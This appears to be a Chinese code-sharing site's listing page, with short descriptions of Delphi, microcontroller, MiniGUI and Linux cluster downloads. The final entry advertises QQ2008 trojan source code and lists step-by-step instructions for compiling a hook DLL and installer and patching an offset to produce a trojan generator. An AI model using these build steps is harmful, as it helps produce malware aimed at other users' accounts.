点菜 ....\Pchen.cfg ....\Pchen.dof ....\Pchen.dpr ....\Pchen.exe ....\Pchen.ini ....\Pchen.res ....\Pchen.~dpr ....\Uchen1.dcu ....\Uchen1.dfm ....\Uchen1.pas ....\Uchen1.~dfm ....\Uchen1.~pas ....\Uchen2.dcu ....\Uchen2.dfm ....\Uchen2.pas ....\Uchen2.~dfm ....\Uchen2.~pas
上传时间: 2015-08-10
这是一个DELPHI与单片机相结合的应用例子 这个程序的主要功能是通过串口与单片机通讯,读写EEPROM的资料。 上位机程序是用Delphi 6.0,下位机程序是CVAVR 1.24, 采用的主芯片是Atmel ATMega16, EEPROM芯片是Atmel AT24C04(或AT24C256) Application ...... 应用程序 for Delphi 6.0 (SP2) ..\EEPROM.dpr ...... DELPHI 项目包 ..\EEPROM.res ...... DELPHI 项目包资源 ..\EEPROM.cfg ..\EEPROM.dof ..\EEPROM.exe ... 编译生成的可执行文件 ..\EEPROM_form.pas ... 主界面程序文件 ..\EEPROM_form.dfm ... 主界面资源文件 ..\HexTable.cds ... 内存表 Fireware ...... 固件程序 for CVAVR 1.24 (+) ..\TestEEPROM.prj ...... 项目程序 ..\TestEEPROM.c ...... 程序文件 ..\TestEEPROM.asm ...... 生成的汇编文件 ..\TestEEPROM.hex ...... 可烧录至Atmel ATMega16的文件
上传时间: 2013-12-10
O REILLY publishing company.<<Practical UNIX and Internet Security>>,goog opensource resource.
标签: publishing opensource Practical Internet
上传时间: 2013-12-25
在pc 机的根目录下建立minigui- free 目录,将下载的源代码包copy 到该目录, 解压缩,生成libminigui-1.3.3、minigui-res-1.3.3、mde-1.3.0、mg-samples-1.3.1。 我在该目录中建立nfsroot 目录,用以存放生成的文件。
上传时间: 2015-11-29
The Linux Enterprise Cluster explains how to take a number of inexpensive computers with limited resources, place them on a normal computer network, and install free software so that the computers act together like one powerful server. This makes it possible to build a very inexpensive and reliable business system for a small business or a large corporation. The book includes information on how to build a high-availability server pair using the Heartbeat package, how to use the Linux Virtual Server load balancing software, how to configure a reliable printing system in a Linux cluster environment, and how to build a job scheduling system in Linux with no single point of failure. The book also includes information on high availability techniques that can be used with or without a cluster, making it helpful for System Administrators even if they are not building a cluster. Anyone interested in deploying Linux in an environment where low cost computer reliability is important will find this book useful.
标签: inexpensive Enterprise computers explains
上传时间: 2014-11-29
上传时间: 2014-01-18
SED1335驱动320x240图形液晶驱动演示程序 接口情况表述: No: LCM ----- 52 --------------------- 1...VSS..... GND 地线 2...VDD..... +5V(VCC) 电源 3...VO ..... -Vadj Input 对比度负压调整输入 4...A0 ..... P2.0 寄存器选择信号,命令数据方式选择 5.../WR..... WR 写有效 6.../RD..... RD 读有效 7...D0 ..... P0.0 数据总线 D0 8...D1 ..... P0.1 数据总线 D1 9...D2 ..... P0.2 数据总线 D2 10..D3 ..... P0.3 数据总线 D3 11..D4 ..... P0.4 数据总线 D4 12..D5 ..... P0.5 数据总线 D5 13..D6 ..... P0.6 数据总线 D6 14..D7 ..... P0.7 数据总线 D7 15../CS .... GND 片选通信号,低电平有效.实际使用应编入地址 16../res.... /resET 复位信号,低电平有效,阻容式复位电路 17..VEE..... -Vout 逆变-22.5V 负电压输出 18..VSS..... GND 地线 0V
上传时间: 2013-12-22
上传时间: 2013-12-20
VBS解析_delphi.rar function ParseFileDir(a_strFileName) { var l_FunNo var l_BaseDir var result l_BaseDir = "D:\\X项目\\" l_FunNo = a_strFileName.substring(0, 5) result = l_BaseDir+l_FunNo + \\ +a_strFileName return result }
标签: var a_strFileName ParseFileDir l_BaseDir
上传时间: 2013-12-04
QQ2008木马源代码,带编译方法。1, 打开 DLL,打开Hook.dpr,project -> Build Hook 得到HOOK.dll 。 2, 运行Brcc.bat,得到hook.res。 3, 打开EXE,打开Install.dpr,project -> Build install 得到Install.exe。 4,运行Brcc.bat,得到zg.res。 5,使用UE打开 Install.exe,搜索 a + 4 个空格。记录下地址。38488 6,打开config, 打开Project1.dpr,在 OFFSET_URL 处填上刚记录下的地址。project -> Project1 得到最终QQ2008木马生成器。保存,退出。 Project1.exe 即为最后的木马生成器
上传时间: 2013-12-11